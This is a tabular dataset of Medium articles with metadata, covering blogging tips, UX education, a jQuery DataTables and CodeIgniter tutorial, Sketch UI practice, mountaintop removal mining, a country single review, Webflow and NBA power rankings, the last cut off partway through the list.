| title | text | url | authors | timestamp | tags |
|---|---|---|---|---|---|
How to Keep Your Blog Running While You’re Away — Socialbuzzhive.com | Hey, we all have to escape sometimes, right? Whether during the holidays or for a much-needed vacation, you can’t be tied to your blog 24/7, nor should you be. The reality, though, is that blogging can be a totally time-consuming process, much more so than people realize. Consistency is one of the most important factors in blogging success. Once your blog is established, and especially if you outsource some help, it gets a bit easier, but for newbie bloggers and website owners the thought of going away on holiday and leaving your baby blog unattended can put you in downright panic mode! But let’s face it, we all have holidays, events, family members, and other things to tend to. Life, after all, should not be just about working, blogging, posting and constantly coming up with new content. Here’s how to keep your blog running smoothly even while you’re away.
Currently, I maintain approximately 4 blog posts per month. In the beginning I was churning out 4 a week!
This level of consistency is super important and helps me maintain a steady level of traffic.
When you decide to have a blog, remember, it’s operating 24 hours a day, 7 days a week.
After all, your blog is your business and it should be treated as such.
So even though it’s producing passive income (and that’s the ultimate goal for you) it still needs tending to in many, many ways.
In this post, I will go over what you can do to ensure your blog stays fully functional and continues to produce tip-top content for your readers, along with income for you! :)
Let’s go!
Tip #1. Batch Your Content
Blogging requires laser focus and excellent planning.
Therefore, batching your content is the best way to ensure that your blog will have new fresh content for your readers.
You as a blogger are a master planner. Yes! Believe it!
Heck, planning a well-deserved trip or vacation on top of all that is just a walk in the park!
Once you’ve booked that trip or flight it’s time to start generating content for the duration of your trip so you ‘set it and forget it’!
Here’s an example: I dedicate my Tuesdays and Thursdays to actual writing, so instead of producing 2 content posts per day, I use those 2 days to produce a week’s worth of content.
Nowadays I’m so busy with other aspects of running my blog I sometimes outsource some content as well which frees up even more time!
Related Post 100 Reasons To Hire A Freelancer to Outsource Your Work
Tip #2. Use The WordPress Timestamp Feature
The WordPress Timestamp feature can save you a lot of time when it comes to creating and publishing your posts.
Let’s say you have a day where you are feeling super inspired about several topics; you are full of energy and you have some great ideas just spilling over that you’re dying to share!
You have written 3 or 4 posts, but you would like to spread them out because you are getting ready to go on vacation, or have that looming deadline for a project at work that you must complete.
Using the Timestamp feature will help you to spread your posts out over a few days and publish them for you.
Here’s how it works.
Take a post that you have written and are ready to publish, including proper tagging, images, etc. Go to the “Post Timestamp” section on your post page and expand it. Select “Edit timestamp” by clicking on it; there should now be a check mark in the box. Edit and select the date and time that you want your post published.
Now there is one important step left in editing your post for future publication.
You now need to click on the “Publish” button.
If you don’t do this and just click on “Save”, it will save your post as a draft and not publish it when you have specified.
This feature has saved me a ton of time and aggravation trying to write posts when I have an endless list of other things to do.
And as bloggers you know that list is endless!
More Articles of Interest 115 Sites That Pay You to Write and Blog 100 Creative Ways to Make Great Money On and Offline How To Create an Epic Social Media Strategy For Your New Website How to Market On Pinterest — The Ultimate Guide 6 Proven Ways to Monetize Your Blog
Tip #3. Share Your Vacation With Your Readers
I don’t like to blog on my vacation or during the holidays because it defeats the whole purpose of a vacation and spending time with family and friends.
But I must be honest, I’m always surmising what I’m going to be writing about next and taking little notes as I go about the day…. and that’s okay.
As long as it’s not completely consuming you and taking you away from everything and those you’re closest to.
If you do find that you’ve made an error you absolutely must fix, then thanks to modern technology, as long as you have a laptop or a smartphone with internet, you’ll be able to fix it from anywhere!
Some of my best blog posts have been written on the fly!
Sometimes the change of scenery is just what you need to get those creative juices flowing!
It also allows you to experience the laptop lifestyle.
You see, a blog is designed for you to share information, but let’s not forget one important element.
A blog is designed to help you and your readers connect and engage.
So why not share your vacation with your readers?
By sharing a bit of your personal life, it helps build your blog’s relationship with your readers.
Share your images, your meals, your adventures. Some amazing travel and food blogs were built this way.
Tip #4. Outsource Your Writing
If you absolutely cannot write, please make sure that you hire someone to cover your writing for you.
Yes, it’s going to cost you some, but the price will be worth it to not lose your audience!
Always look at the bigger picture.
Sure, it will cost you some money to hire someone, but you can potentially lose thousands of readers if you don’t.
And after all the work you’ve put into your blog you don’t want that to happen!
Have some valuable content built up for sharing on topics that you’ve chosen that you know your readers will enjoy or find super helpful.
Tip #5. Line Up Guest Posts
It’s not a bad idea to line up some guest posts for your blog.
Similar to outsourcing for writers, someone else will be doing the writing for you. The only difference between a guest post and outsourcing is the cost.
Guest posts are typically free.
Guest bloggers will write an article for you and in turn get a backlink which leads to traffic back to their own website. It’s a win win for both bloggers and something you want to incorporate even when you’re not on vacation!
Related Posts 2021’s Best Free Blogging Tools to Grow Your Blog Fast 6 Marketing Hacks You Need for the Holidays Now How to Start and Grow Your Business On YouTube
It’s your blog and you can do whatever you want with it.
Some obsess over every aspect of control over it and some are way more relaxed. I tend to be the former:/…but I’m still learning that I cannot have 100% control at all times!
I do recommend you ensure your blog stays operational even when you’re not available.
Unless you’re already at the stage where your blog runs on autopilot, or you have a team of VAs working with you to handle things, it only makes sense.
It’s not so hard to do living in the digital age we’re in. And the best thing is you can do it from virtually anywhere!
Remember, life/work balance is very important too.
The last thing you want is blogger burnout.
You can still manage to make time to enjoy that holiday or vacay and be a successful blogger! 🙂
If you found this article helpful please comment and like and share on social!
Get my 20 resources to grow your business and to turn your blog into a passive income machine today! | https://medium.com/@emilysocialbuzzhive/how-to-keep-your-blog-running-while-youre-away-socialbuzzhive-com-a43b4dd4fba2 | ['Emily Standley'] | 2021-03-09 18:02:06.347000+00:00 | ['Blogger', 'Onlinebusiness', 'Blogging', 'Blogtips', 'Bloggingtips'] |
What to consider when deciding on a UX education | What to consider when deciding on a UX education
How to find a course that works best for your priorities.
Photo by Yannis Papanastasopoulos on Unsplash
A few years ago, when I discovered I wanted to work in user experience design, I spent months scouring bootcamp descriptions, online courses and master’s programs. I had phone calls with recruiters, did all the free bootcamp tutorials and talked to lots of current UX designers and hiring managers. It was not a decision I took lightly, and I didn’t have the money to take a risk since I was already struggling to find a career with a liveable income. Already ten years out of my undergrad, I needed to have the skills necessary to actually get a job and make enough to live on. I met successful designers who studied at bootcamps, in master’s programs, and on their own, and I received mixed messages about everything. The consistent theme about courses was “it is what you make of it” and “you will have to do projects outside of what is assigned”. So with a racing heart, I committed my time and money to a master’s degree. I knew I had to make it work.
Before I began my master’s program I wrote my first Medium article describing my journey to this career change, and since then I’ve had lots of aspiring user experience designers reach out to ask my advice. The most common question was how to decide between a master’s program and a bootcamp, so I wanted to share my thoughts on what you should consider before deciding on a user experience education.
Consider your priorities
Deciding on a program of learning or changing careers is a very personal choice, and every individual’s situation will be different. Before you decide how you will study, consider your priorities. Often it is not just about learning a new skill: some people want a master’s degree on their resume, while some want to start working in the field as quickly as possible; others want to make sure they feel confident before applying for roles (you probably won’t anyway); some people study so they can live in a particular location, while others are happy learning from their couch. Here are a few factors you might want to consider.
1. Location
Where do you want to study? Where do you want to live after you study? Is this a place you can start building a network now? What are the job prospects in the area after you graduate?
2. Format
Will you find time to commit to a self motivated online course? Do you prefer intense learning or need time to take things in? Do you want a practical approach so you are ready for a job or a more academic approach that could lead to a PhD or further study?
3. Title
Do you want a recognized certification for your studies? Do you want the title of a masters degree? Do you just want to learn and get a job as quickly as possible?
4. Time
Are you starting as a complete beginner with no other design or technology experience? Or do you have a little experience that you can draw from already? Do you have other obligations in your future like a wedding or moving?
5. Cost
How much money can you commit to your education? Could you use the time spent on school learning on the job instead? (Sure, you never know if you can get a job until you have a portfolio and start looking.) How long will it take you to pay for the course once you get a UX job?
6. Career support
How much career support do you need? Do you already have a portfolio and resume or will you need to start from scratch?
So many factors affect the decision to go to school, so if you are clear about your personal motivation, it can help you get through difficult classes and times of ambiguity until you reach your goal. For me, having a really good course was important, but I also wanted to live abroad; cost and time were factors, so one year was the longest I wanted to commit to. | https://uxdesign.cc/what-to-consider-when-deciding-on-a-ux-education-7270be341f4d | ['Amanda Conlon'] | 2020-12-31 12:00:58.368000+00:00 | ['Design Education', 'User Experience', 'UX Design', 'Ux Design Bootcamp', 'Changing Careers'] |
JQuery Datatable Server Side Processing Use Codeigniter and MySQL PHP. | How to get huge number of rows in jquery datatable from database using PHP, Codeigniter and MySQL ?
Let’s start by learning something new about jQuery DataTables.
We often use jQuery DataTables in our web projects, but we face loading issues when fetching large amounts of data from the database: the pagination of a client-side DataTable does not work smoothly. To solve this problem we use server-side processing in jQuery DataTables, which resolves the loading issue even when fetching millions of rows.
In this article we will learn how to fetch millions of rows from the database smoothly.
Now Start =>
Step 1: We will use CodeIgniter 3 along with the jQuery DataTables CDN and the Bootstrap CDN.
Step 2: Open the project folder in your editor.
Step 3: Create a database and configure it for your project in application/config/database.php
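As a rough sketch (not taken from the original post), a trimmed-down application/config/database.php for CodeIgniter 3 might look like this. The credentials are placeholders you would replace with your own, and the stock file ships with more options than shown here:

```php
// application/config/database.php (CodeIgniter 3) - trimmed sketch, values are placeholders
$db['default'] = array(
    'dsn'      => '',
    'hostname' => 'localhost',
    'username' => 'your_db_user',      // replace with your MySQL user
    'password' => 'your_db_password',  // replace with your MySQL password
    'database' => 'your_database',     // replace with your database name
    'dbdriver' => 'mysqli',
    'char_set' => 'utf8',
    'dbcollat' => 'utf8_general_ci',
);
```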
Step 4: Now we will use the jQuery DataTables CDN in the view page. Paste the CSS link inside the head tag of the page, and paste the JS link before the closing html tag.
CDN download from: https://datatables.net/download/
Step 5: Now we will use the Bootstrap CDN in our view page. Same as Step 4: paste the style link before the closing of the head tag, and paste the javascript link before the closing html tag.
CDN Download from: https://getbootstrap.com/docs/3.3/getting-started/
Using the bootstrap-theme.min.css link is optional, not compulsory.
Step 6: Add the jQuery link to the view page; it must be above the DataTables link.
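Putting Steps 4 to 6 together, the view page skeleton might look roughly like this. The version numbers and CDN paths are illustrative examples, not from the original post; use the links you downloaded from the pages above:

```html
<!DOCTYPE html>
<html>
<head>
    <!-- Bootstrap and DataTables CSS go inside <head> -->
    <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css">
    <link rel="stylesheet" href="https://cdn.datatables.net/1.10.22/css/jquery.dataTables.min.css">
</head>
<body>
    <!-- the table markup from Step 7 goes here -->

    <!-- jQuery must be loaded BEFORE the DataTables script -->
    <script src="https://code.jquery.com/jquery-3.5.1.min.js"></script>
    <script src="https://cdn.datatables.net/1.10.22/js/jquery.dataTables.min.js"></script>
</body>
</html>
```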
Step 7: Now create an HTML table in the view page with pagination, and fill it with static sample data.
Step 8: Call the DataTable function.
$(document).ready(function() {
$('#example').DataTable();
} );
Step 10: Now create a controller and a model for fetching the data from the database. I am using my sample table, which has 1000 rows and 5 columns.
Step 11: Now implement the jQuery DataTables AJAX call for fetching the data from the database using a CodeIgniter controller and model.
$(document).ready(function() {
    tableLoad();

    function tableLoad() {
        var table = $('#example').DataTable({
            "processing": true,
            "serverSide": true,
            "ajax": "<?=base_url('Welcome/getData')?>",
            "order": [[2, 'desc']],
            "columnDefs": [
                {"targets": 0, "name": "id", 'searchable': true, 'orderable': true},
                {"targets": 1, "name": "post_type", 'searchable': true, 'orderable': true},
                {"targets": 2, "name": "caption", 'searchable': true, 'orderable': true},
                {"targets": 3, "name": "img_1", 'searchable': true, 'orderable': true},
                {"targets": 4, "name": "username", 'searchable': true, 'orderable': true}
            ]
        });
    }
});
After using this code in the view page, we need to return the data in JSON format from the controller method:
/**
 * @method used to fetch data via the getData method of the Welcome model
 */
public function getData() {
    // Read the DataTables state from the GET parameters, with sane defaults
    if (isset($_GET['search']['value'])) {
        $search = $_GET['search']['value'];
    } else {
        $search = '';
    }
    if (isset($_GET['length'])) {
        $limit = $_GET['length'];
    } else {
        $limit = 10;
    }
    if (isset($_GET['start'])) {
        $offset = $_GET['start'];
    } else {
        $offset = 0;
    }
    $orderType = $_GET['order'][0]['dir'];
    $nameOrder = $_GET['columns'][$_GET['order'][0]['column']]['name'];

    $records = $this->Welcome_model->getData($limit, $search, $offset, $nameOrder, $orderType);

    // Build the rows in the column order expected by the view
    $data = array();
    $i = 0 + $offset;
    foreach ($records['data'] as $row) {
        if ($row['status'] == 0) {
            $status = '<span class="btn btn-danger btn-sm tgl_change_post danger" data-status="1" id="post_' . $row['user_id'] . '" data-id="' . $row['user_id'] . '">Inactive</span>';
        } elseif ($row['status'] == 1) {
            $status = '<span class="btn btn-success btn-sm tgl_change_post" data-status="0" data-id="' . $row['user_id'] . '" id="post_' . $row['user_id'] . '">Active</span>';
        }
        $data[] = array(
            ++$i,
            $row['username'],
            $row['first_name'] . ' ' . $row['last_name'],
            $row['gender'],
            $status,
        );
    }
    $records['data'] = $data;
    echo json_encode($records);
}
In the controller we read the DataTables variables (limit, order, search and offset) from the GET request. Now create a method in the model for fetching the data from the database.
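For context, when serverSide is enabled, DataTables sends its state in the query string of the AJAX request, e.g. start, length, search[value] and order[0][dir]. The mapping from those paging parameters to the limit and offset used above can be sketched as follows (the function name and numbers are illustrative, not part of DataTables itself):

```javascript
// Sketch: mapping DataTables' `start`/`length` GET parameters to paging values.
// `start` is the zero-based row offset of the current page, `length` the page size.
function toPaging(start, length) {
    return {
        limit: length,            // rows per page -> SQL LIMIT
        offset: start,            // first row index -> SQL OFFSET
        page: start / length + 1  // 1-based page number, for display only
    };
}

// e.g. the third page of a table showing 10 rows per page:
var paging = toPaging(20, 10); // -> { limit: 10, offset: 20, page: 3 }
```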
/**
 * @method used to fetch data from the database
 */
public function getData($limit, $search, $offset, $ordername, $ordertype) {
    // Total number of rows in the table
    $total = $this->db->count_all('user_details');

    $query = $this->db->get('user_details');
    $totalRecord = $query->result_array();

    // No filtering is applied yet, so the filtered count equals the total
    return array("recordsTotal" => $total, "recordsFiltered" => $total, 'data' => $totalRecord);
}
After these implementations we will get the following result.
Step 12: Now we will refine our query to fetch the data according to the user's needs: limit, search, order and so on.
To fetch a limited set of data, use the limit method in the query:
public function getData($limit, $search, $offset, $ordername, $ordertype) {
    // Total rows before paging
    $total = $this->db->count_all('user_details');

    // Fetch only the rows for the current page
    $this->db->limit($limit, $offset);
    $query = $this->db->get('user_details');
    $totalRecord = $query->result_array();

    // No search filter yet, so the filtered count equals the total
    return array("recordsTotal" => $total, "recordsFiltered" => $total, 'data' => $totalRecord);
}
Now the table looks like this:
For search, use the like method in the query:
public function getData($limit, $search, $offset, $ordername, $ordertype) {
    // Total rows before any filtering
    $total = $this->db->count_all('user_details');

    // Count the rows matching the search, without the limit
    if (!empty($search)) {
        $this->db->like('username', $search);
        $filtered = $this->db->count_all_results('user_details');
    } else {
        $filtered = $total;
    }

    // Fetch the current page of matching rows
    if (!empty($search)) {
        $this->db->like('username', $search);
    }
    $this->db->limit($limit, $offset);
    $query = $this->db->get('user_details');
    $totalRecord = $query->result_array();

    return array("recordsTotal" => $total, "recordsFiltered" => $filtered, 'data' => $totalRecord);
}
Now the result looks like this:
To order the results in ascending or descending order:
public function getData($limit, $search, $offset, $ordername, $ordertype) {
    // Total rows before filtering
    $total = $this->db->count_all('user_details');

    // Count the rows matching the search, without the limit
    if (!empty($search)) {
        $this->db->like('username', $search);
        $filtered = $this->db->count_all_results('user_details');
    } else {
        $filtered = $total;
    }

    // Fetch the current page of rows, searched and ordered
    if (!empty($search)) {
        $this->db->like('username', $search);
    }
    $this->db->order_by($ordername, $ordertype);
    $this->db->limit($limit, $offset);
    $query = $this->db->get('user_details');
    $totalRecord = $query->result_array();

    return array("recordsTotal" => $total, "recordsFiltered" => $filtered, 'data' => $totalRecord);
}
Now the data looks like this:
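For reference, DataTables expects the JSON echoed by the controller to have the general shape below: recordsTotal and recordsFiltered drive the pager, and data holds one inner array per row in column order. The values here are made-up sample data, not real output from the tutorial's table:

```javascript
// Sketch of the server-side response shape DataTables expects.
var response = {
    recordsTotal: 1000,   // rows in the table before filtering
    recordsFiltered: 42,  // rows matching the current search box value
    data: [
        // one inner array per table row, in column order
        [1, "jsmith", "John Smith", "male", "Active"]
    ]
};
```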
I hope you have learned how to use DataTables server-side processing with a database in CodeIgniter. Please share your thoughts in the comment section below.
For example code, you can clone the project from GitHub.
Follow me on GitHub | https://medium.com/@lovelesh-singh614/jquery-datatable-server-side-processing-use-codeigniter-and-mysql-php-de2df83ea15 | ['Lovelesh Singh'] | 2020-12-13 14:48:19.419000+00:00 | ['MySQL', 'Codeigniter', 'Datatables', 'Jqu', 'PHP'] |
UI Design: Design Practise in Sketch | The first hurdle I came across was the font style -probably the most notable difference you can see. The Guardian uses their own custom-designed font, Guardian Egyptian. For the purpose of this exercise I used Merriweather, as it was suggested online that this was a similar free alternative.
As you can see the difference is most apparent for the larger headlines, however less noticable in smaller sizes.
Although it was my first time using Sketch, I found it fairly intuitive to use, as I have used Photoshop in the past, as well as other image editing apps. After completing the clone of the first page, the rest could easily be completed by copying elements from the first page. The tutorial for this exercise also included a lot of shortcut commands, and once I got used to using them, the exercise went along much quicker.
Style Observations
The colour of article headlines depended on category, e.g. red and black for international news, or pink and purple for lifestyle articles.
A sans font was used for live updates, e.g. time-related notifications, while the serif font Guardian Egyptian was used for everything else, i.e. published articles and headlines.
UI design patterns: article list, categorisation, navigation tabs, continuous scrolling, modal window, pull to refresh.
Takeaways | https://medium.com/@amanda.low/ironhack-prework-exercise-2-design-practise-35c725ca76cd | ['Amanda Low'] | 2019-12-16 17:37:37.781000+00:00 | ['UI', 'UX', 'Design', 'Typography', 'Sketch'] |
Misery in the Mountain State: The Catastrophic Impacts of Mountaintop Removal in Rural Appalachia | A mountaintop removal site in West Virginia. Source: earthjustice.org.
In Boone County, West Virginia, residents learn at a young age to avoid all contact with the tap water flowing from pipes in their homes. Ryan Hall-Massey, a seven-year-old boy, has had half of his teeth capped to replace enamel decimated from brushing his teeth with it. An 18-year-old neighbor fared even worse: he has only one tooth remaining. Ryan’s brother is covered with painful lesions on his arms, legs and chest from bathing in the water. In a span of 10 houses in his neighborhood, six people have had brain tumors. 30 percent of the area residents have had their gallbladders removed.
Boone County residents noticed changes in their water right about when nearby coal companies began to inject toxic slurry into abandoned underground mine shafts. When EPA tests found that their wells had arsenic, barium, lead, and manganese well over the healthy rates, nobody was surprised.
Boone County, West Virginia is not an isolated case. Rather, it is emblematic of an entire region — home to 25 million people — that has suffered at the hands of an oppressive fossil fuel industry that prioritizes short-term profits over long-term rights to existence.
Mountaintop removal (MTR) is a form of surface coal mining primarily used in the Appalachian mountains. The process of MTR involves clearcutting — and often burning — forests, and using explosives and heavy machinery to detonate hundreds of feet of rock from mountaintops, exposing coal layers that are inaccessible via other mining techniques.
“The problem is that for every about a meter of coal, you have about 99 meters of rock that you have to put somewhere during this process. And when you’re in a landscape like Appalachia, the place that most of that rock ends up being put is in river valleys,” said Duke biologist Emily Bernhardt, who co-authored a report about the devastating impact MTR can have on the health of rivers.
Standing atop a MTR site in southern West Virginia last October, an Appalachia native explained it to me as such: “If fracking and traditional mining are drawing blood or removing organs from a mountain, mountaintop removal is crushing its bones.”
For this reason, MTR — often called “strip mining on steroids” — is regarded as the most destructive form of coal mining.
More than 500 mountaintops have already been destroyed, more than one million acres of forest have been clearcut, and over a thousand miles of valley streams have been buried under tons of rubble, polluting drinking water and threatening the health and safety of the region’s inhabitants.
Once exposed to oxygen and rain, the newly uncovered rocks and soil begin to leach long-sequestered metals and chemicals. As a result, the water emerging from the base of these valleys is often contaminated by chemicals, which can spread to groundwater, the source of most household tap water.
MTR operations began in the 1970s, but did not take off until the ’90s, ironically as a result of Clean Air Act amendments made to curtail acid rain. Because acid rain results in part from anthropogenic emissions of sulfur, in 1990 the EPA amended the Clean Air Act to limit sulfur emissions. One way to reduce acid rain is to use coal with a lower sulfur content. Coal buried deep in the Appalachian mountains is naturally lower in sulfur than that of Western coalfields, which made MTR an attractive option.
Justified by research highlighting the adverse effects of air pollution, the Clean Air Act seeks to mitigate the health impacts of burning coal, but neglects to address the implications of mining it. In effect, by regulating coal production on a national level, the Clean Air Act exacerbated environmental injustice in the nation’s mining capital: central Appalachia.
A 2017 mountaintop removal explosion in West Virginia. Source: huffpost.com.
Economic Impacts
MTR perpetuates poverty and leads to mass migration out of Appalachian cities. Most central Appalachian towns have seen gradual population decline since the 1950s. Economic studies in West Virginia and Kentucky have shown that MTR costs the states more revenue than it produces. Compared to traditional mining, MTR is not only more expensive, but is highly mechanized and employs fewer people — heavy machines do most of the clear-cutting, excavating, loading, and bulldozing of rubble. Areas in Central Appalachia with the highest MTR rates also have the highest unemployment rates and lowest income levels in the region.
As former Senator Robert Byrd put it in 2009: “The Central Appalachian coal seams that remain to be mined are becoming thinner and more costly to mine. Mountaintop removal mining, a declining national demand for energy, rising mining costs and erratic spot market prices all add up to fewer jobs in the coal fields.”
Coal companies claim that MTR flattens space for future development, but only 3 percent of former mine sites have been developed. The major developments on MTR sites across Appalachia have been maximum-security federal prisons, which exposes inmates to all of MTR’s adverse health impacts, like air and water pollution. Federal prisons are not the sort of meaningful employment opportunities that will stimulate local economies and bring large swaths of Appalachia out of poverty.
MTR eliminates the potential for development based on ecotourism and sustainable forest products. The environmental degradation of MTR makes the land unattractive for future alternative economic development. One study found that, contrary to pro-MTR arguments, MTR did not positively contribute to employment in surrounding areas; in fact, MTR counties had lower income levels and higher unemployment rates than non-MTR regions.
“Blowing up mountains, deforesting large tracts of land, polluting streams, destroying roads from all the trucks going by, coating the landscape in dust, making people sick — what other employers are going to move into that area?” said Michael Hendryx, a Mountaintop Removal researcher at Indiana University. “If you aren’t lucky enough to have one of those jobs, you’ve probably got nothing, you’ve got maybe a part-time job at the Dollar Store. Because there aren’t other opportunities, the economic base has been destroyed.”
Contaminated water near an MTR site in Morgantown, West Virginia. Source: MountaineerNewsService.com.
Water contamination
Perhaps the most egregious impact of MTR on these montane communities is water contamination, which makes itself felt through an array of peculiar health impacts in neighboring communities. Post-MTR, toxic slurry has leached arsenic, chromium, mercury, and lead into groundwater, which has led to elevated rates of these chemicals in groundwater and in residents’ private wells.
Mountaintop removal “valley fills” are responsible for burying more than 2,000 miles of vital Appalachian headwater streams, and poisoning many more. In the words of U.S. District Judge Charles H. Haden II: “If there is any life form that cannot acclimate to life deep in a rubble pile, it is eliminated. No effect on related environmental values is more adverse than obliteration. Under a valley fill, the water quantity of the stream becomes zero. Because there is no stream, there is no water quality.”
Indeed, in large swaths of Eastern Kentucky and Southern West Virginia, the dearth of clean, safe drinking water is a regular fact of life. In West Virginia, a boil-water notice is posted whenever a system’s water quality is compromised by factors like chemical contamination, line breaks that lead to sediment build-up, or inadequate disinfection. Boil-water notices urge residents to boil water coming from their household pipes before using it, or avoid using it until further notice. From 2013 to 2018, West Virginia counties posted more than 7,000 boil-water notices, many of which lasted months, and even years. In O’Toole — a small town in the heart of coalfield country — residents were on a continuous boil-water notice for more than 17 years.
Residents of these communities recount bizarre experiences reminiscent of horror movies, such as Fanta orange-colored water flowing from sinks, children emerging from baths covered in bleeding sores, and sudden, inexplicable cases of incontinence.
For months on end, Appalachians are denied the comfort of showering and bathing in their homes; they collect rainwater in buckets; and must buy bottled water or drive to natural springs in search of potable water. As contamination takes its toll across the state, many counties fall short of federal water quality standards. One 2019 study found that more than 65 percent of West Virginia counties consistently rank among the top third in the nation for violations of the Safe Drinking Water Act, a federal law that protects the quality of drinking water. In some wells, manganese concentrations reached 4,063 parts per billion (the EPA recommends that manganese in drinking water not exceed 50 parts per billion).
A map depicting the correlation between lung cancer deaths and MTR mine sites in Appalachia. Source: appvoices.org.
Health impacts
The health impacts of MTR are well-documented. Over the last decade, more than two dozen peer-reviewed studies have found correlations between mountaintop removal coal mining and increased rates of cancer, heart and respiratory diseases, and other negative health outcomes. Research shows that MTR-related toxins found in water can jeopardize human health, even when the water is not directly consumed, but merely used for activities like bathing, brushing teeth, and washing clothes and dishes.
In 2016, the Obama Administration authorized a National Academy of Sciences study into the health effects of mountaintop removal mining, but the Trump administration cancelled the study without explanation in mid-2017. Despite a lack of federal funding for MTR research, university researchers have produced an abundance of robust studies demonstrating the deleterious effects of MTR.
One study — which examined nearly 2 million live birth records in central Appalachia over a period of 7 years — found that communities near MTR sites had higher rates of six out of seven types of birth defects, and residents in closer proximity to MTR sites saw higher rates of birth defects. Another concluded that, since the passage of the Clean Air Act, MTR regions have seen a disproportionate increase in mortality rates related to respiratory cancer, respiratory disease, and other respiratory illnesses.
In a particularly groundbreaking study from Michael Hendryx’s team at Indiana University, researchers found that ecological impairment of stream ecosystems is directly correlated with human cancer mortality rates in surrounding areas. | https://medium.com/the-climate-series/misery-in-the-mountain-state-the-impacts-of-mountaintop-removal-in-rural-appalachian-west-virginia-5796ada02896 | ['Allie Lowy'] | 2020-11-01 23:33:26.390000+00:00 | ['Mining', 'Environment', 'Fossil Fuels', 'Health', 'Environmental Justice'] |
Single Spotlight- Chris Shiflett’s “This Ol’ World” | What is it with artists from outside the country genre making better and more authentic country music than artists within the genre itself? On Chris Shiflett’s 2017 album West Coast Town, he proved he could write a classic Bakersfield country song. And not just one. But a whole album’s worth. Shiflett returns with “This Ol’ World,” the first follow-up to the excellent West Coast Town.
Shiflett has said his next album will be a little more guitar-driven, but if “This Ol’ World” is any indication, the album will still be firmly planted in some breezy, Bakersfield-esque country music.
The song opens with some subtle steel guitar covered by a nice mix of acoustic and electric guitar before the drums kick in. In fact, the strength of the production is felt right from the start. The pacing really allows the song’s urgency to be felt without drowning the listener, and the several solos that come later in the song (both steel and lead guitar) are boot-stompers and really fit the identity Chris Shiflett has cultivated with his solo career. And indeed, Shiflett’s sound has become something worthy of a modern-day Buck Owens or Waylon Jennings. It’s the way the steel guitar and lead guitar play off each other. The two instruments aren’t competing; rather, they’re complementing each other, something that characterizes the music of the aforementioned legends.
While the production is strong, the lyrics may even be stronger. I have spoken before about the artist Chris Shiflett has become. He doesn’t come from a country background. So while he can write country-themed lyrics, his strengths reside in crafting rock-oriented lyrics set to country production. “This Ol’ World” isn’t a complicated song lyrically. But what sets it apart is Shiflett’s ability to say so much without resorting to grandiosity.
Shiflett’s point in “This Ol’ World” is straightforward. “Has this ol’ world lost its god-damn mind?” Shiflett asks. “I hope you’re doing alright,” he continues. It’s a protest song, in a way. But in a larger sense it’s a commentary about the world at large. Rather than resort to typical political clichés, Shiflett combines a rocker’s sense of the world with a country artist’s desire to hold tight to his loved one.
Rock on, Chris!
Source: https://medium.com/shore2shore-country/single-spotlight-chris-shifletts-this-ol-world-757ce5db8aa3 (Nathan Kanuch, 2019-03-12)
Figuring out what I like to do as a UX Designer
Sathish Kumar · Dec 26 · 3 min read
Photo by Christina Morillo from Pexels
Designing websites has been my newfound love as a UX Designer. Over the last two years I have spent my time working on multiple projects, including designing mobile apps, web-based products, and websites.
As a UX Designer working in a small design agency, you don’t get to choose what kind of work you do, especially in the early stages of your design career; you end up doing whatever has been given to you. It is, in any case, a good thing to try your hand at different kinds of design challenges until you figure out which one you really like doing. Though I was interested in doing all of the above, I didn’t quite feel satisfied, since I wasn’t building any of the final outputs that the users would use.
I would always start on a project, do my part as the designer, and hand the designs over to developers to build as specified; what finally reached the users never quite looked the way it was designed.
Be it a website, an app, or a digital product, you need some knowledge of programming in order to build your own designs yourself, so the final output takes the shape you wanted.
Learning to code was difficult for me. I tried once during the 2020 COVID lockdown, but I had neither majored in any computer-related degree nor taken the computer science track in high school. After giving up on learning to code, I looked for alternatives that could fulfill my desire to turn my own designs into a final output that reaches the users.
After several days of exploration I found an amazing tool that helps you build websites on your own without any coding needed. But you might ask, ‘There are a lot of website builders out there, what’s new in this?’ Yes, there are a lot of website builders like Wix, WordPress, etc., but having tried those I still didn’t feel they were designer-friendly or able to help you bring all your creative ideas into reality.
This amazing tool is called ‘Webflow’, a product from an American startup that allows designers to create stunning websites without code.
Finally I found something I could use to build my designs and hand them over to clients without needing the help of a developer. You don’t need to know coding to build a website using Webflow; the tool might take some time to learn, but you will eventually love the process.
I built some websites while I was learning the tool, and I am still learning what else it can do. In the end, it helped me fulfill my desire to convert my designs into a usable end product without the help of developers.
Being a Designer in India, using Webflow could be a little challenging due to its high pricing compared to its Indian peers. I will talk more about whether Webflow is the right tool for Indian designers in my upcoming posts.
Source: https://medium.com/design-bootcamp/figuring-out-what-i-like-to-do-being-a-ux-designer-708ddfe5895 (Sathish Kumar, 2020-12-27)
NBA Power Rankings - The Top 10 Teams Heading Into the 20–21 Season
10. Dallas Mavericks
19–20 Record: 43–32 (7th in West)
Dallas picked up G/F Josh Richardson to replace Seth Curry, who left in free agency. Richardson will bring solid two-way play to Dallas, who struggled at times defensively last year. With Kristaps Porzingis healthy and Luka Doncic an MVP candidate, the Mavericks will look to make a deep run in the star-studded Western Conference.
9. Philadelphia 76ers
19–20 Record: 43–40 (6th in East)
Much has changed since the Sixers were swept by the Celtics in the first round of the 2020 NBA Playoffs. Former Houston Rockets GM Daryl Morey took over the franchise and respected head coach Doc Rivers was hired. Morey added Seth Curry and Danny Green to complement Ben Simmons on the perimeter. Dwight Howard will play alongside Joel Embiid down low. Morey replaced Al Horford with three point shooters, seemingly trying the same approach he did in Houston.
8. Portland Trail Blazers
19–20 Record: 35–39 (9th in West)
The Blazers had a strong free agency, adding F Robert Covington, F Derrick Jones Jr., F/C Harry Giles, and C Enes Kanter while only losing F Trevor Ariza. The Blazers made their exceptional “Bubble” run last year without Ariza, who opted out of the restart. Their trip to the playoffs was fueled by historic shooting from Dame and a steady supply of offense from Carmelo Anthony. With Dame and C.J. McCollum returning once again as one of the best backcourts in the league, and with improved perimeter defense, the Blazers are well suited to make another run in the West.
7. Boston Celtics
19–20 Record: 48–24 (3rd in East)
While the Celtics lost a steady scorer in Gordon Hayward, they also lost his absurd contract. Boston signed F/C Tristan Thompson and underrated G Jeff Teague. After Jayson Tatum signed a max extension, all eyes will be on him to carry the offensive load, with Jaylen Brown complementing him. However, for Boston to be a true contender, G Kemba Walker will need to be a reliable third option, something that may be difficult if his knee problems continue.
6. Denver Nuggets
19–20 Record: 46–27 (3rd in West)
